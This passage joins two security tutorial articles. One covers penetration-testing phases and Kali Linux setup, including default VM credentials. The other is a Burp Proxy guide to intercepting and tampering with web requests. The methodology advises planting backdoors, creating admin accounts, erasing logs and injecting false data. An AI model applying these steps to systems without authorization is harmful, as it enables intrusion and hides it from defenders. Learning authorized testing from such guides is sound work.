Obtain a foothold
Capture unauthorized data
Aggressively social engineer
Attack other systems or applications
Document findings

Step 4 – Privilege Escalation

Having access to a target does not guarantee accomplishing the goal of a penetration assignment. In many cases, exploiting a vulnerable system may only give limited access to a target's data and resources. The attacker must escalate the privileges granted in order to gain the access required to capture the flag, which could be sensitive data, critical infrastructure, and so on. Privilege Escalation can include identifying and cracking passwords, user accounts, and unauthorized IT space. An example is achieving limited user access, identifying a shadow file containing administration login credentials, obtaining an administrator password through password cracking, and accessing internal application systems with administrator access rights. Kali Linux includes a number of tools that can help gain Privilege Escalation, found in the Password Attacks and Exploitation Tools catalogs.
Since most of these tools include methods to obtain initial access as well as Privilege Escalation, they are gathered and grouped according to their toolsets.

The following is the list of Privilege Escalation goals:

Obtain escalated access to system(s) and network(s)
Uncover other user account information
Access other systems with escalated privileges
Document findings

Step 5 – Maintaining a foothold

The final step is maintaining access by establishing other entry points into the target and, if possible, covering evidence of the penetration. It is possible that penetration efforts will trigger defenses that will eventually secure the way the Penetration Tester obtained access to the network. Best practice is establishing other means to access the target as insurance against the primary path being closed. Alternative access methods could be backdoors, new administration accounts, encrypted tunnels, and new network access channels.

The other important aspect of maintaining a foothold in a target is removing evidence of the penetration. This will make it harder to detect the attack, thus reducing the reaction by security defenses. Removing evidence includes erasing user logs, masking existing access channels, and removing the traces of tampering, such as error messages caused by penetration efforts. Kali Linux includes a catalog titled Maintaining Access, focused on keeping a foothold within a target. These tools are used for establishing various forms of backdoors into a target.

The following is the list of goals for maintaining a foothold:

Establish multiple access methods to the target network
Remove evidence of the access obtained
Repair systems impacted by exploitation
Inject false data if needed
Hide communication methods through encryption and other means
Document findings

Introducing Kali Linux

The creators of BackTrack have released a new, advanced Penetration Testing Linux distribution named Kali Linux. BackTrack 5 was the last major version of the BackTrack distribution. The creators of BackTrack decided that, to move forward with the challenges of cyber security and modern testing, a new foundation was needed. Kali Linux was born and released on March 13th, 2013. Kali Linux is based on Debian and an FHS-compliant filesystem.

Kali has many advantages over BackTrack. It comes with many more updated tools. The tools are streamlined with the Debian repositories and synchronized four times a day, which means users have the latest package updates and security fixes. The FHS-compliant filesystem translates into being able to run most tools from anywhere on the system. Kali has also made customization, unattended installation, and flexible desktop environments strong features. Kali Linux is available for download at http://www.kali.org/.

Kali system setup

Kali Linux can be downloaded in a few different ways. One of the most popular ways to get Kali Linux is to download the ISO image, which is available in 32-bit and 64-bit versions. If you plan on using Kali Linux on a virtual machine such as VMware, there is a prebuilt VM image. The advantage of downloading the VM image is that it comes preloaded with VMware Tools. The VM image is a 32-bit image with Physical Address Extension (PAE) support. In theory, a PAE kernel allows the system to access more memory than a traditional 32-bit operating system. There have been some well-known personalities in the world of operating systems who have argued for and against the usefulness of a PAE kernel.
However, the authors of this article suggest using the VM image of Kali Linux if you plan on using it in a virtual environment.

Running Kali Linux from external media

Kali Linux can be run without installing software on a host hard drive by accessing it from an external media source such as a USB drive or DVD. This method is simple to enable; however, it has performance and operational implications. Loading programs from an external source impacts performance, and some applications or hardware settings may not operate properly. Using read-only storage media also does not permit saving custom settings that may be required to make Kali Linux operate correctly. It is highly recommended to install Kali Linux on a host hard drive.

Installing Kali Linux

Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you'll need compatible computer hardware. Kali is supported on i386, amd64, and ARM (both armel and armhf) platforms. The minimum hardware requirements are shown in the following list, although we suggest exceeding them by at least three times; Kali Linux, in general, will perform better with more RAM and on newer machines. Download Kali Linux and either burn the ISO to DVD or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or a USB port on your computer, check out the Kali Linux Network Install.

The following is a list of minimum installation requirements:

- A minimum of 8 GB disk space for installing Kali Linux
- For i386 and amd64 architectures, a minimum of 512 MB RAM
- CD-DVD drive / USB boot support

You will also need an active Internet connection before installation. This is very important, or you will not be able to configure and access repositories during installation.

1. When you start Kali, you will be presented with a Boot Install screen. You may choose what type of installation (GUI-based or text-based) you would like to perform.
2. Select the local language preference, country, and keyboard preferences.
3. Select a hostname for the Kali Linux host. The default hostname is Kali.
4. Select a password. Simple passwords may not work, so choose something that has some degree of complexity.
5. The next prompt asks for your time zone. Modify accordingly and select Continue. The next screenshot shows selecting Eastern standard time.
6. The installer will ask to set up your partitions. If you are installing Kali on a virtual image, select Guided Install – Whole Disk. This will destroy all data on the disk and install Kali Linux. Keep in mind that on a virtual machine, only the virtual disk is getting destroyed. Advanced users can select manual configuration to customize partitions. Kali also offers the option of using LVM (Logical Volume Manager), which allows you to manage and resize partitions after installation. In theory, it provides flexibility when storage needs change after the initial installation. However, unless your Kali Linux needs are extremely complex, you most likely will not need it.
7. The last window displays a review of the installation settings. If everything looks correct, select Yes to continue the process, as shown in the following screenshot:

Kali Linux uses central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via the HTTP protocol.
If your network uses a proxy server, you will also need to configure the proxy settings for your network.

Kali will prompt to install GRUB. GRUB is a multi-boot loader that gives the user the ability to pick and boot into one of multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to dual boot, you will want to make sure GRUB recognizes the other operating systems so that it can give users the option to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux.

Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select Continue to reboot your system.

Kali Linux and VM image first run

On some Kali installation methods, you will be asked to set the root password. When Kali Linux boots up, enter the username root and the password you selected. If you downloaded a VM image of Kali, you will need the root password; the default username is root and the password is toor.

Kali toolset overview

Kali Linux offers a number of customized tools designed for Penetration Testing. Tools are categorized in the following groups, as seen in the drop-down menu shown in the following screenshot:

- Information Gathering: These are Reconnaissance tools used to gather data on your target network and devices. Tools range from identifying devices to identifying protocols used.
- Vulnerability Analysis: Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering Reconnaissance tools.
- Web Applications: These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this article come directly from this category. However, web applications do not always refer to attacks against web servers; they can simply be web-based tools for networking services. For example, web proxies are found under this section.
- Password Attacks: This section of tools primarily deals with brute forcing or the offline computation of passwords or shared keys used for authentication.
- Wireless Attacks: These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools are found here, including tools such as aircrack, airmon, and wireless password cracking tools. This section also has tools related to RFID and Bluetooth vulnerabilities. In many cases, the tools in this section need to be used with a wireless adapter that Kali can configure into monitor mode.
- Exploitation Tools: These are tools used to exploit vulnerabilities found in systems. Usually, a vulnerability is identified during a Vulnerability Assessment of a target.
- Sniffing and Spoofing: These are tools used for network packet captures, network packet manipulation, packet crafting, and web spoofing. There are also a few VoIP reconstruction applications.
- Maintaining Access: Maintaining Access tools are used once a foothold is established into a target system or network. It is common to find compromised systems with multiple hooks back to the attacker, providing alternative routes in the event that a vulnerability used by the attacker is found and remediated.
- Reverse Engineering: These tools are used to disassemble executables and debug programs. The purpose of reverse engineering is analyzing how a program was developed so it can be copied, modified, or used to lead to the development of other programs. Reverse Engineering is also used for malware analysis, to determine what an executable does, or by researchers attempting to find vulnerabilities in software applications.
- Stress Testing: Stress Testing tools are used to evaluate how much data a system can handle. Undesired outcomes can result from overloading systems, such as causing a device controlling network communication to open all communication channels, or causing a system to shut down (also known as a denial of service attack).
- Hardware Hacking: This section contains Android tools, which could be classified as mobile, and Arduino tools that are used for programming and controlling other small electronic devices.
- Forensics: Forensics tools are used to monitor and analyze computer network traffic and applications.
- Reporting Tools: Reporting tools are methods to deliver information found during a penetration exercise.
- System Services: This is where you can enable and disable Kali services. Services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH.

Summary

This article served as an introduction to Penetration Testing Web Applications and an overview of setting up Kali Linux. We started off defining best practices for performing Penetration Testing services, including defining risk and the differences between various services. The key takeaway is to understand what makes a Penetration Test different from other security services, how to properly scope a level of service, and the best method to perform those services. Positioning the right expectations upfront with a potential client will better qualify the opportunity and simplify developing an acceptable scope of work.

This article continued with an overview of Kali Linux. Topics included how to download your desired version of Kali Linux, ways to perform the installation, and a brief overview of the available toolsets. The next article will cover how to perform Reconnaissance on a target. This is the first and most critical step in delivering Penetration Testing services.

Resources for Article:

Further resources on this subject: BackTrack 4: Security with Penetration Testing Methodology [Article] CISSP: Vulnerability and Penetration Testing for Access Control [Article] Making a Complete yet Small Linux Distribution [Article]
Quick start – Using Burp Proxy

At the top of Burp Proxy, you will notice the following three tabs:

- intercept: HTTP requests and responses that are in transit can be inspected and modified from this window
- options: Proxy configurations and advanced preferences can be tuned from this window
- history: All intercepted traffic can be quickly analyzed from this window

If you are not familiar with the HTTP protocol or you want to refresh your knowledge, HTTP Made Really Easy, A Practical Guide to Writing Clients and Servers, found at http://www.jmarshall.com/easy/http/, is a compact reference.

Step 1 – Intercepting web requests

After firing up Burp and configuring the browser, let's intercept our first HTTP request. During this exercise, we will intercept a simple request to the publisher's website:

1. In the intercept tab, make sure that Burp Proxy is properly stopping all requests in transit by checking the intercept button. This should be marked as intercept is on.
2. In the browser, type http://www.packtpub.com/ in the URL bar and press Enter.
3. Back in Burp Proxy, you should be able to see the HTTP request made by the browser. At this stage, the request is temporarily stopped in Burp Proxy, waiting for the user to either forward or drop it.
4. For instance, press forward and return to the browser. You should see the home page of Packt Publishing as you would when normally interacting with the website.
5. Again, type http://www.packtpub.com/ in the URL bar and press Enter. Let's press drop this time. Back in the browser, the page will contain the warning Burp proxy error: message was dropped by user. Since we dropped the request, Burp Proxy did not forward it to the server. As a result, the browser received a temporary HTML page with the warning message generated by Burp instead of the original HTML content.
6. Let's try one more time. Type http://www.packtpub.com/ in the URL bar of the browser and press Enter. Once the request is properly captured by Burp Proxy, the action button becomes active. Click on it to display the contextual menu. This is an important piece of functionality, as it allows you to import the current web request into any of the other Burp tools. You can already imagine the potential of having a set of integrated tools that lets you manipulate and analyze web requests so easily. For example, if we want to decode the request, we can simply click on send to decoder.

Burp Proxy

In Burp Proxy, we can also decide to automatically forward all requests without waiting for the user to either forward or drop the communication. By clicking on the intercept button, it is possible to switch from intercept is on to intercept is off. Nevertheless, the proxy will record all requests in transit.

Burp Proxy also allows you to automatically intercept all responses matching specific characteristics. Take a look at the numerous options available in the intercept server response section within the Burp Proxy options tab. For example, it is possible to intercept the server's response only if the client's request was intercepted. This is extremely helpful while testing input validation vulnerabilities, as we are generally interested in evaluating the server's responses to all tampered requests. Alternatively, you may only want to intercept and inspect responses having a specific return code (for example, 200 OK).
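Note that Burp sits between any HTTP client and the server, not just a browser. As a minimal sketch, the following Python snippet (using the third-party requests library) routes a request through Burp; it assumes Burp Proxy is listening on its default address of 127.0.0.1:8080.

```python
import requests  # third-party: pip install requests

# Burp Proxy listens on 127.0.0.1:8080 by default; adjust if you changed it.
burp_proxy = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

# With intercept on, this request appears in the intercept tab and waits for
# you to press forward or drop, just like a request made from the browser.
# For HTTPS targets, you would also need to trust Burp's CA certificate.
response = requests.get("http://www.packtpub.com/", proxies=burp_proxy)
print(response.status_code, len(response.text))
```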
Step 2 – Inspecting web requests

Once a request is properly intercepted, it is possible to inspect its entire content, headers, and parameters using one of the four Burp Proxy message analysis tabs:

- raw: This view allows you to display the web request in raw format within a simple text editor. This is a very handy visualization, as it enables maximum flexibility for further changing the content.
- params: In this view, the focus is on user-supplied parameters (GET/POST parameters, cookies). This is particularly important in the case of complex requests, as it allows you to consider all entry points for potential vulnerabilities. Whenever applicable, Burp Proxy will also automatically perform URL decoding. In addition, Burp Proxy will attempt to parse commonly used formats, including JSON.
- headers: Similarly, this view displays the HTTP header names and values in tabular form.
- hex: In the case of binary content, it is useful to inspect the hexadecimal representation of the resource. This view allows you to display a request as in a traditional hex editor.

The history tab enables you to analyze all web requests that have transited through the proxy:

1. Click on the history tab. At the top, Burp Proxy shows all the requests in the bundle. At the bottom, it displays the content of the request and response corresponding to the specific selection. If you have previously modified the request, Burp Proxy history will also display the modified version.

Displaying HTTP requests and responses intercepted by Burp Proxy

2. By double-clicking on one of the requests, Burp will automatically open a new window with the specific content. From this window, it is possible to browse all the captured communication using the previous and next buttons.
3. Back in the history tab, Burp Proxy displays several details for each item, including the request method, URL, response code, and length. Each request is uniquely identified by a number, visible in the left-hand column.
4. Click on the request identifier. Burp Proxy allows you to set a color for that specific item. This is extremely helpful for highlighting important requests or responses. For example, during the initial application enumeration, you may notice an interesting request; you can mark it and get back to it later for further testing. Burp Proxy history is also useful when you have to evaluate a sequence of requests in order to reproduce a specific application behavior.
5. Click on the display filter at the top of the history list to hide irrelevant content. If you want to analyze all HTTP requests containing at least one parameter, select the show only parameterised checkbox. If you want to display requests having a specific response, just select the appropriate response code in the filter by status code selection.

At this point, you may have already understood the potential of the tool to filter and reveal interesting traffic. In addition, when using Burp Suite Professional, you can also use the filter by search term option. This feature is particularly important when you need to analyze hundreds of requests or responses, as you can filter relevant traffic by using regular expressions or simply by matching particular strings. Using this feature, you may also be able to discover sensitive information (for example, credentials) embedded in the intercepted pages.
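To get a feel for the URL decoding and parameter parsing that the params view automates, here is a small sketch using Python's standard library; the URL below is purely illustrative:

```python
from urllib.parse import urlsplit, parse_qs

# An illustrative request URL with a URL-encoded parameter value.
url = "http://www.example.com/books/all?keys=web%20testing&page=2"

parts = urlsplit(url)
params = parse_qs(parts.query)  # decodes percent-encoding automatically

print(parts.path)  # /books/all
print(params)      # {'keys': ['web testing'], 'page': ['2']}
```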
Step 3 – Tampering web requests

As part of a typical security assessment, you will need to modify HTTP requests and analyze the web application's responses. For example, to identify SQL injection vulnerabilities, it is important to inject common attack vectors (for example, a single quote) into all user-supplied input, including HTTP headers, cookies, and GET/POST parameters. If you want to refresh your knowledge of common web application vulnerabilities, the OWASP Top Ten Project article at https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project is a good starting point.

Tampering web requests with Burp is as easy as editing strings in a text editor:

1. Intercept a request containing at least one HTTP parameter. For example, you can point your browser to http://www.packtpub.com/books/all?keys=ASP.
2. Go to Burp Proxy | Intercept. At this point, you should see the corresponding HTTP request.
3. From the raw view, you can simply edit any aspect of the web request in transit. For example, you can change the value of the keys GET parameter from ASP to PHP. Edit the request to look like the following:

   GET /books/all?keys=PHP HTTP/1.1
   Host: www.packtpub.com
   User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: en-us,en;q=0.5
   Accept-Encoding: gzip, deflate
   Proxy-Connection: keep-alive

4. Click on forward and get back to the browser. This should result in a search query performed with the string PHP. You can verify it by simply checking the results in the HTML page.

Although we have used the raw view to change the previous HTTP request, it is actually possible to use any of the Burp Proxy views. For example, in the params view, it is possible to add a new parameter by following these steps:

1. Click on new (right side) in the Burp Proxy params view.
2. Select the proper parameter type (URL, body, or cookie). URL should be used for GET parameters, whereas body denotes POST parameters.
3. Type the name and the value of the newly created parameter.

Advanced features

After practicing with the basic features provided by Burp Proxy, you are almost ready to experiment with more advanced configurations.

Match and replace

Let's imagine that you are testing an application designed for mobile devices using a standard browser on your computer. In most cases, the web server examines the user-agent provided by the browser to identify the specific platform and responds with customized resources that better fit mobile phones and tablets. Under these circumstances, you will find the match and replace function provided by Burp Proxy very useful. Let's configure Burp Proxy to tamper with the user-agent HTTP header field:

1. In the options tab of Burp Proxy, scroll down to the match and replace section.
2. Under the match and replace table, a drop-down list and two text fields allow you to create a customized rule. Select request header from the drop-down list, since we want to create a match condition pertaining to HTTP requests.
3. Type ^User-Agent.*$ in the first text field. This field represents the match within the HTTP request. Burp Proxy's match and replace feature allows you to use simple strings as well as complex regular expressions. If you are not familiar with regular expressions, have a look at http://www.regular-expressions.info/quickstart.html.
4. In the second text field, type Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3 or any other fake user-agent that you want to impersonate.
5. Click add and verify that the new match has been added to the list; this button is shown here:

Burp Proxy match and replace list

6. Intercept a request, leave it to pass through the proxy, and verify that it has been automatically modified by the tool.

Automatically modified HTTP header in Burp Proxy
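Conceptually, such a rule is nothing more than a regular-expression substitution applied to the raw request headers. The following Python sketch reproduces the same logic on a hypothetical captured request (line endings simplified to \n for clarity):

```python
import re

# A hypothetical intercepted request, one header per line.
raw_request = (
    "GET /books/all?keys=PHP HTTP/1.1\n"
    "Host: www.packtpub.com\n"
    "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) "
    "Gecko/20100101 Firefox/15.0.1\n"
    "Accept: text/html\n"
)

# The replacement header, mimicking the mobile user-agent typed into Burp.
fake_agent = (
    "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) "
    "AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3"
)

# Same match condition as the Burp rule (^User-Agent.*$); re.MULTILINE makes
# ^ and $ anchor at the start and end of each header line.
tampered = re.sub(r"^User-Agent.*$", fake_agent, raw_request, flags=re.MULTILINE)
print(tampered)
```

Burp applies this kind of substitution automatically to every request passing through the proxy, which is what makes the feature so convenient during a long test session.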
HTML modification

Another interesting feature of Burp Proxy is automatic HTML modification, which can be activated and configured in the appropriate section within Burp Proxy | options. By using this function, you can automatically remove JavaScript or modify the HTML forms of all received HTTP responses. Some applications deploy client-side validation in the form of disabled HTML form fields or JavaScript code. If you want to verify the presence of server-side controls that enforce specific data formats, you would need to tamper the request with invalid data. In these situations, you can either manually tamper the request in the proxy or enable HTML modification to remove any client-side validation and use the browser to submit invalid data. This function can also be used to display hidden form fields. Let's see in practice how you can activate this feature:

1. In Burp Proxy, go to options and scroll down to the HTML modification section. Numerous options are available in this section:

   - unhide hidden form fields: displays hidden HTML form fields
   - enable disabled form fields: allows submitting all input forms present inside the HTML page
   - remove input field length limits: allows extra-long strings in text fields
   - remove JavaScript form validation: makes Burp Proxy remove all onsubmit handler JavaScript functions from HTML forms
   - remove all JavaScript: completely removes all JS scripts
   - remove object tags: removes embedded objects within the HTML document

2. Select the desired checkboxes to activate automatic HTML modification.

Summary

Using this feature, you will be able to understand whether the web application enforces server-side validation. For instance, some insecure applications use client-side validation only (for example, via JavaScript functions). You can activate the automatic HTML modification feature by selecting the remove JavaScript form validation checkbox in order to perform input validation testing directly from your browser.

Resources for Article:

Further resources on this subject: Visual Studio 2010 Test Types [Article] Ordered and Generic Tests in Visual Studio 2010 [Article] Manual, Generic, and Ordered Tests using Visual Studio 2008 [Article]